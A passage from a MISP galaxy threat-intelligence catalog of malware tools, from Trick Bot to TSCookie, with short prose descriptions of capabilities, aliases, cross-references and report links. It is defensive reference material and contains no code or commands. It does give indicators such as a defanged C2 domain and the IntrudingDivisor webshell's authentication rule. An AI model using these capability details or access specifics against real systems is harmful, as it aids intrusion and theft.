Many links indicate, that this bot is another product of the people previously involved in Dyreza. It seems to be rewritten from scratch – however, it contains many similar features and solutions to those we encountered analyzing Dyreza (read more).

The tag is: misp-galaxy:tool="Trick Bot"

Trick Bot is also known as:

  • TrickBot

  • TrickLoader

Trick Bot has relationships with:

  • similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Trickbot" with estimative-language:likelihood-probability="likely"

Table 16531. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://blog.fraudwatchinternational.com/malware/trickbot-malware-works

https://securityintelligence.com/trickbot-is-hand-picking-private-banks-for-targets-with-redirection-attacks-in-tow/

https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/

Hackshit

Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all the activities related to Hackshit PhaaS.

The tag is: misp-galaxy:tool="Hackshit"

Table 16532. Table References

Links

https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped

Moneygram Adwind

The tag is: misp-galaxy:tool="Moneygram Adwind"

Table 16533. Table References

Links

https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/

Banload

Banload has been around since the last decade. This malware generally arrives on a victim’s system through a spam email containing an archived file or bundled software as an attachment. In a few cases, this malware may also be dropped by other malware or a drive-by download. When executed, Banload downloads other malware, often banking Trojans, on the victim’s system to carry out further infections.

The tag is: misp-galaxy:tool="Banload"

Banload has relationships with:

  • similar: misp-galaxy:malpedia="Banload" with estimative-language:likelihood-probability="almost-certain"

Table 16534. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/03/banload-malware-affecting-brazil-exhibits-unusually-complex-infection-process/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/banload

http://blog.trendmicro.com/trendlabs-security-intelligence/banload-limits-targets-via-security-plugin/

https://securingtomorrow.mcafee.com/mcafee-labs/banload-trojan-targets-brazilians-with-malware-downloads/

Smoke Loader

This small application is used to download other malware. What makes the bot interesting are various tricks that it uses for deception and self protection.

The tag is: misp-galaxy:tool="Smoke Loader"

Smoke Loader is also known as:

  • SmokeLoader

Smoke Loader has relationships with:

  • similar: misp-galaxy:mitre-malware="Smoke Loader - S0226" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

Table 16535. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

LockPoS

The analyzed sample has a recent compilation date (2017-06-24) and is available on VirusTotal. It starts out by resolving several Windows functions using API hashing (CRC32 is used as the hashing function).

The tag is: misp-galaxy:tool="LockPoS"

LockPoS has relationships with:

  • similar: misp-galaxy:malpedia="LockPOS" with estimative-language:likelihood-probability="almost-certain"

Table 16536. Table References

Links

https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/

Fadok

Win.Worm.Fadok drops several files. %AppData%\RAC\mls.exe or %AppData%\RAC\svcsc.exe are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.

The tag is: misp-galaxy:tool="Fadok"

Fadok is also known as:

  • Win32/Fadok

Table 16537. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm%3AWin32%2FFadok.A

http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html

Loki Bot

Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.

The tag is: misp-galaxy:tool="Loki Bot"

Table 16538. Table References

Links

https://phishme.com/loki-bot-malware/

KONNI

Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim’s machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:

The tag is: misp-galaxy:tool="KONNI"

KONNI has relationships with:

  • similar: misp-galaxy:rat="Konni" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

Table 16539. Table References

Links

http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

NOKKI

Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’. The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks. Because of code overlap found within both malware families, as well as infrastructure overlap, we believe the threat actors responsible for KONNI are very likely also responsible for NOKKI. Previous reports stated it was likely KONNI had been in use for over three years in multiple campaigns with a heavy interest in the Korean peninsula and surrounding areas. As of this writing, it is not certain if the KONNI or NOKKI operators are related to known adversary groups operating in the regions of interest, although there is evidence of a tenuous relationship with a group known as Reaper.

The tag is: misp-galaxy:tool="NOKKI"

NOKKI has relationships with:

  • similar: misp-galaxy:malpedia="Nokki" with estimative-language:likelihood-probability="almost-certain"

Table 16540. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

SpyDealer

Recently, Palo Alto Networks researchers discovered an advanced Android malware we’ve named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.

The tag is: misp-galaxy:tool="SpyDealer"

Table 16541. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

CowerSnail

CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems.

The tag is: misp-galaxy:tool="CowerSnail"

Table 16542. Table References

Links

https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/

Svpeng

In mid-July 2017, we found a new modification of the well-known mobile banking malware family Svpeng – Trojan-Banker.AndroidOS.Svpeng.ae. In this modification, the cybercriminals have added new functionality: it now also works as a keylogger, stealing entered text through the use of accessibility services.

The tag is: misp-galaxy:tool="Svpeng"

Svpeng is also known as:

  • trojan-banker.androidos.svpeng.ae

Svpeng has relationships with:

  • similar: misp-galaxy:android="Svpeng" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Svpeng" with estimative-language:likelihood-probability="likely"

Table 16543. Table References

Links

https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/

TwoFace

While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization. The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell. It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server. Due to these two layers, we use the name TwoFace to track this webshell. During our analysis, we extracted the commands executed by the TwoFace webshell from the server logs on the compromised server. Our analysis shows that the commands issued by the threat actor date back to June 2016; this suggests that the actor had access to this shell for almost an entire year. The commands issued show the actor was interested in gathering credentials from the compromised server using the Mimikatz tool. We also saw the attacker using the TwoFace webshell to move laterally through the network by copying itself and other webshells to other servers.

The tag is: misp-galaxy:tool="TwoFace"

TwoFace has relationships with:

  • similar: misp-galaxy:malpedia="TwoFace" with estimative-language:likelihood-probability="almost-certain"

Table 16544. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

IntrudingDivisor

Like TwoFace, the IntrudingDivisor webshell requires the threat actor to authenticate before issuing commands. To authenticate, the actor must provide two pieces of information, first an integer that is divisible by 5473 and a string whose MD5 hash is “9A26A0E7B88940DAA84FC4D5E6C61AD0”. Upon successful authentication, the webshell has a command handler that uses integers within the request to determine the command to execute - To complete

The tag is: misp-galaxy:tool="IntrudingDivisor"

Table 16545. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

JS_POWMET

Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.

The tag is: misp-galaxy:tool="JS_POWMET"

Table 16546. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/

EngineBox Malware

The main malware capabilities include a privilege escalation attempt using MS16–032 exploitation; a HTTP Proxy to intercept banking transactions; a backdoor to make it possible for the attacker to issue arbitrary remote commands and a C&C through a IRC channel. As it’s being identified as a Generic Trojan by most of VirusTotal (VT) engines, let s name it EngineBox— the core malware class I saw after reverse engineering it.

The tag is: misp-galaxy:tool="EngineBox Malware"

Table 16547. Table References

Links

https://isc.sans.edu/diary/22736

Joao

Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victim’s computer. To spread their malware, the attackers behind Joao have misused massively-multiplayer online role-playing games (MMORPGs) originally published by Aeria Games. At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.

The tag is: misp-galaxy:tool="Joao"

Joao has relationships with:

  • similar: misp-galaxy:malpedia="Joao" with estimative-language:likelihood-probability="likely"

Table 16548. Table References

Links

https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/

Fireball

Upon execution, Fireball installs a browser hijacker as well as any number of adware programs. Several different sources have linked different indicators of compromise (IOCs) and varied payloads, but a few details remain the same.

The tag is: misp-galaxy:tool="Fireball"

Fireball has relationships with:

  • similar: misp-galaxy:malpedia="Fireball" with estimative-language:likelihood-probability="likely"

Table 16549. Table References

Links

https://www.cylance.com/en_us/blog/threat-spotlight-is-fireball-adware-or-malware.html

ShadowPad

ShadowPad is a modular cyber-attack platform that attackers deploy in victim networks to gain flexible remote control capabilities. The platform is designed to run in two stages. The first stage is a shellcode that was embedded in a legitimate nssock2.dll used by Xshell, Xmanager and other software packages produced by NetSarang. This stage is responsible for connecting to “validation” command and control (C&C) servers and getting configuration information including the location of the real C&C server, which may be unique per victim. The second stage acts as an orchestrator for five main modules responsible for C&C communication, working with the DNS protocol, loading and injecting additional plugins into the memory of other processes.

The tag is: misp-galaxy:tool="ShadowPad"

ShadowPad is also known as:

  • POISONPLUG

  • Barlaiy

ShadowPad has relationships with:

  • similar: misp-galaxy:malpedia="ShadowPad" with estimative-language:likelihood-probability="likely"

Table 16550. Table References

Links

https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf

IoT_reaper

IoT_reaper is fairly large now and is actively expanding. For example, there are multiple C2s we are tracking, the most recently data (October 19) from just one C2 shows the number of unique active bot IP address is more than 10k per day. While at the same time, there are millions of potential vulnerable device IPs being queued into the c2 system waiting to be processed by an automatic loader that injects malicious code to the devices to expand the size of the botnet.

The tag is: misp-galaxy:tool="IoT_reaper"

Table 16551. Table References

Links

http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/

FormBook

FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016.

The tag is: misp-galaxy:tool="FormBook"

FormBook has relationships with:

  • similar: misp-galaxy:malpedia="Formbook" with estimative-language:likelihood-probability="almost-certain"

Table 16552. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html

https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/

Dimnie

Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.

The tag is: misp-galaxy:tool="Dimnie"

Dimnie has relationships with:

  • similar: misp-galaxy:malpedia="Dimnie" with estimative-language:likelihood-probability="likely"

Table 16553. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/

ALMA Communicator

The ALMA Communicator Trojan is a backdoor Trojan that uses DNS tunneling exclusively to receive commands from the adversary and to exfiltrate data. This Trojan specifically reads in a configuration from the cfg file that was initially created by the Clayslide delivery document. ALMA does not have an internal configuration, so the Trojan does not function without the cfg file created by the delivery document.

The tag is: misp-galaxy:tool="ALMA Communicator"

ALMA Communicator has relationships with:

  • similar: misp-galaxy:malpedia="Alma Communicator" with estimative-language:likelihood-probability="almost-certain"

Table 16554. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/

Silence

In September 2017, we discovered a new targeted attack on financial institutions. Victims are mostly Russian banks but we also found infected organizations in Malaysia and Armenia. The attackers were using a known but still very effective technique for cybercriminals looking to make money: gaining persistent access to an internal banking network for a long period of time, making video recordings of the day to day activity on bank employees’ PCs, learning how things works in their target banks, what software is being used, and then using that knowledge to steal as much money as possible when ready. We saw that technique before in Carbanak, and other similar cases worldwide. The infection vector is a spear-phishing email with a malicious attachment. An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims.

The tag is: misp-galaxy:tool="Silence"

Silence has relationships with:

  • similar: misp-galaxy:malpedia="Silence" with estimative-language:likelihood-probability="likely"

Table 16555. Table References

Links

https://securelist.com/the-silence/83009/

Volgmer

Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries. It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer

The tag is: misp-galaxy:tool="Volgmer"

Volgmer has relationships with:

  • similar: misp-galaxy:mitre-malware="Volgmer - S0180" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="FALLCHILL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

Table 16556. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318B

Nymaim

Nymaim is a 2-year-old strain of malware most closely associated with ransomware. We have seen recent attacks spreading it using an established email marketing service provider to avoid blacklists and detection tools. But instead of ransomware, the malware is now being used to distribute banking Trojans

The tag is: misp-galaxy:tool="Nymaim"

Nymaim has relationships with:

  • similar: misp-galaxy:malpedia="Nymaim" with estimative-language:likelihood-probability="likely"

Table 16557. Table References

Links

https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0

GootKit

As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same – to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The tag is: misp-galaxy:tool="GootKit"

GootKit is also known as:

  • Gootkit

GootKit has relationships with:

  • similar: misp-galaxy:malpedia="GootKit" with estimative-language:likelihood-probability="likely"

Table 16558. Table References

Links

https://securelist.com/inside-the-gootkit-cc-server/76433/

https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/

https://securityintelligence.com/gootkit-launches-redirection-attacks-in-the-uk/

https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99

Agent Tesla

Agent Tesla is modern powerful keystroke logger. It provides monitoring your personel computer via keyboard and screenshot. Keyboard, screenshot and registered passwords are sent in log. You can receive your logs via e-mail, ftp or php(web panel).

The tag is: misp-galaxy:tool="Agent Tesla"

Agent Tesla has relationships with:

  • similar: misp-galaxy:malpedia="Agent Tesla" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Hagga" with estimative-language:likelihood-probability="likely"

Table 16559. Table References

Links

https://www.agenttesla.com/

https://www.bleepingcomputer.com/news/security/zoho-heavily-used-by-keyloggers-to-transmit-stolen-data/

Ordinypt

A new ransomware strain called Ordinypt is currently targeting victims in Germany, but instead of encrypting users' documents, the ransomware rewrites files with random data. Ordinypt is actually a wiper and not ransomware because it does not bother encrypting anything, but just replaces files with random data.

The tag is: misp-galaxy:tool="Ordinypt"

Ordinypt is also known as:

  • HSDFSDCrypt

Ordinypt has relationships with:

  • similar: misp-galaxy:malpedia="Ordinypt" with estimative-language:likelihood-probability="likely"

Table 16560. Table References

Links

https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/

StrongPity2

Detected by ESET as Win32/StrongPity2, this spyware notably resembles one that was attributed to the group called StrongPity.

The tag is: misp-galaxy:tool="StrongPity2"

StrongPity2 is also known as:

  • Win32/StrongPity2

Table 16561. Table References

Links

https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/

wp-vcd

WordPress site owners should be on the lookout for a malware strain tracked as wp-vcd that hides in legitimate WordPress files and that is used to add a secret admin user and grant attackers control over infected sites. The malware was first spotted online over the summer by Italian security researcher Manuel D’Orso. The initial version of this threat was loaded via an include call for the wp-vcd.php file —hence the malware’s name— and injected malicious code into WordPress core files such as functions.php and class.wp.php. This was not a massive campaign, but attacks continued throughout the recent months.

The tag is: misp-galaxy:tool="wp-vcd"

Table 16562. Table References

Links

https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-campaign-is-back/

https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-spreads-via-nulled-wordpress-themes/

MoneyTaker 5.0

malicious program for auto replacement of payment data in AWS CBR

The tag is: misp-galaxy:tool="MoneyTaker 5.0"

Table 16563. Table References

Links

https://www.group-ib.com/blog/moneytaker

Quant Loader

Described as a "professional exe loader / dll dropper" Quant Loader is in fact a very basic trojan downloader. It began being advertised on September 1, 2016 on various Russian underground forums.

The tag is: misp-galaxy:tool="Quant Loader"

Quant Loader has relationships with:

  • similar: misp-galaxy:malpedia="QuantLoader" with estimative-language:likelihood-probability="likely"

Table 16564. Table References

Links

https://www.bleepingcomputer.com/news/security/quant-loader-is-now-bundled-with-other-crappy-malware/

https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground

https://www.bleepingcomputer.com/news/security/worlds-largest-spam-botnet-finds-a-new-way-to-avoid-detection-for-now/

SSHDoor

The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either an hardcoded password or SSH key.

The tag is: misp-galaxy:tool="SSHDoor"

SSHDoor has relationships with:

  • similar: misp-galaxy:malpedia="SSHDoor" with estimative-language:likelihood-probability="likely"

Table 16565. Table References

Links

https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/

TRISIS

(Dragos Inc.) The team identifies this malware as TRISIS because it targets Schneider Electric’s Triconex safety instrumented system (SIS) enabling the replacement of logic in final control elements. TRISIS is highly targeted and likely does not pose an immediate threat to other Schneider Electric customers, let alone other SIS products. (FireEye Inc.) This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack. TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016.

The tag is: misp-galaxy:tool="TRISIS"

TRISIS is also known as:

  • TRITON

Table 16566. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://dragos.com/blog/trisis/TRISIS-01.pdf

GratefulPOS

GratefulPOS has the following functions 1. Access arbitrary processes on the target POS system 2. Scrape track 1 and 2 payment card data from the process(es) 3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.

The tag is: misp-galaxy:tool="GratefulPOS"

GratefulPOS has relationships with:

  • similar: misp-galaxy:banker="GratefulPOS" with estimative-language:likelihood-probability="likely"

Table 16568. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

PRILEX

Prilex malware steals the information of the infected ATM’s users. In this case, it was a Brazilian bank, but consider the implications of such an attack in your region, whether you’re a customer or the bank.

The tag is: misp-galaxy:tool="PRILEX"

PRILEX has relationships with:

  • similar: misp-galaxy:malpedia="Prilex" with estimative-language:likelihood-probability="almost-certain"

Table 16569. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/

CUTLET MAKER

Cutlet Maker is an ATM malware designed to empty the machine of all its banknotes. Interestingly, while its authors have been advertising its sale, their competitors have already cracked the program, allowing anybody to use it for free.

The tag is: misp-galaxy:tool="CUTLET MAKER"

Table 16570. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/

Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants.Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot.The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869.Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.

The tag is: misp-galaxy:tool="Satori"

Satori is also known as:

  • Okiru

Satori has relationships with:

  • similar: misp-galaxy:botnet="Satori" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 16571. Table References

Links

https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/

https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant

PowerSpritz

PowerSpritz is a Windows executable that hides both its legitimate payload and malicious PowerShell command using a non-standard implementation of the already rarely used Spritz encryption algorithm (see the Attribution section for additional analysis of the Spritz implementation). This malicious downloader has been observed being delivered via spearphishing attacks using the TinyCC link shortener service to redirect to likely attacker-controlled servers hosting the malicious PowerSpritz payload.

The tag is: misp-galaxy:tool="PowerSpritz"

PowerSpritz has relationships with:

  • similar: misp-galaxy:malpedia="PowerSpritz" with estimative-language:likelihood-probability="almost-certain"

Table 16572. Table References

Links

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

PowerRatankba

PowerRatankba is used for the same purpose as Ratankba: as a first stage reconnaissance tool and for the deployment of further stage implants on targets that are deemed interesting by the actor. Similar to its predecessor, PowerRatankba utilizes HTTP for its C&C communication.

The tag is: misp-galaxy:tool="PowerRatankba"

PowerRatankba has relationships with:

  • similar: misp-galaxy:malpedia="PowerRatankba" with estimative-language:likelihood-probability="likely"

Table 16573. Table References

Links

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

Ratankba

In one instance we observed, one of the initial malware delivered to the victim, RATANKBA, connects to a legitimate but compromised website from which a hack tool (nbt_scan.exe) is also downloaded. The domain also serves as one of the campaign’s platform for C&C communication. The threat actor uses RATANKBA to survey the lay of the land as it looks into various aspects of the host machine where it has been initially downloaded—the machine that has been victim of the watering hole attack. Information such as the running tasks, domain, shares, user information, if the host has default internet connectivity, and so forth.

The tag is: misp-galaxy:tool="Ratankba"

Ratankba has relationships with:

  • similar: misp-galaxy:malpedia="Ratankba" with estimative-language:likelihood-probability="almost-certain"

Table 16574. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/

USBStealer

USBStealer serves as a network tool that extracts sensitive information from air-gapped networks. We have not seen this component since mid 2015.

The tag is: misp-galaxy:tool="USBStealer"

USBStealer has relationships with:

  • similar: misp-galaxy:mitre-malware="USBStealer - S0136" with estimative-language:likelihood-probability="likely"

Table 16575. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Downdelph

Downdelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our white paper, its period of activity was from November 2013 to September 2015 and there have been no new variants seen since.

The tag is: misp-galaxy:tool="Downdelph"

Downdelph has relationships with:

  • similar: misp-galaxy:mitre-malware="Downdelph - S0134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Downdelph" with estimative-language:likelihood-probability="likely"

Table 16576. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

CoinMiner

Monero-mining malware

The tag is: misp-galaxy:tool="CoinMiner"

CoinMiner has relationships with:

  • similar: misp-galaxy:malpedia="Monero Miner" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Coinminer" with estimative-language:likelihood-probability="almost-certain"

Table 16577. Table References

Links

https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/

FruitFly

A fully-featured backdoor, designed to perversely spy on Mac users

The tag is: misp-galaxy:tool="FruitFly"

FruitFly has relationships with:

  • similar: misp-galaxy:malpedia="FruitFly" with estimative-language:likelihood-probability="likely"

Table 16578. Table References

Links

https://objective-see.com/blog/blog_0x25.html#FruitFly

MacDownloader

Iranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.

The tag is: misp-galaxy:tool="MacDownloader"

MacDownloader is also known as:

  • iKitten

MacDownloader has relationships with:

  • similar: misp-galaxy:malpedia="MacDownloader" with estimative-language:likelihood-probability="likely"

Table 16579. Table References

Links

https://objective-see.com/blog/blog_0x25.html#MacDownloader

Empyre

The open-source macOS backdoor, 'Empye', maliciously packaged into a macro’d Word document

The tag is: misp-galaxy:tool="Empyre"

Empyre is also known as:

  • Empye

Table 16580. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Empyre

Proton

A fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files, browser login data, and keychains.

The tag is: misp-galaxy:tool="Proton"

Table 16581. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Proton

Mughthesec

Adware which hijacks a macOS user’s homepage to redirect search queries.

The tag is: misp-galaxy:tool="Mughthesec"

Mughthesec has relationships with:

  • similar: misp-galaxy:malpedia="Mughthesec" with estimative-language:likelihood-probability="likely"

Table 16582. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Pwnet

A macOS crypto-currency miner, distributed via a trojaned 'CS-GO' hack.

The tag is: misp-galaxy:tool="Pwnet"

Pwnet has relationships with:

  • similar: misp-galaxy:malpedia="Pwnet" with estimative-language:likelihood-probability="likely"

Table 16583. Table References

Links

https://objective-see.com/blog/blog_0x25.html

CpuMeaner

A macOS crypto-currency mining trojan.

The tag is: misp-galaxy:tool="CpuMeaner"

CpuMeaner has relationships with:

  • similar: misp-galaxy:malpedia="CpuMeaner" with estimative-language:likelihood-probability="likely"

Table 16584. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Travle

The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.

The tag is: misp-galaxy:tool="Travle"

Travle is also known as:

  • PYLOT

Table 16585. Table References

Links

https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/

Digmine

Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.

The tag is: misp-galaxy:tool="Digmine"

Table 16586. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/

TSCookie

TSCookie itself only serves as a downloader. It expands functionality by downloading modules from C&C servers. The sample that was examined downloaded a DLL file which has exfiltrating function among many others (hereafter “TSCookieRAT”). Downloaded modules only runs on memory.

The tag is: misp-galaxy:tool="TSCookie"

TSCookie has relationships with:

  • similar: misp-galaxy:malpedia="PLEAD (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PLEAD" with estimative-language:likelihood-probability="likely"

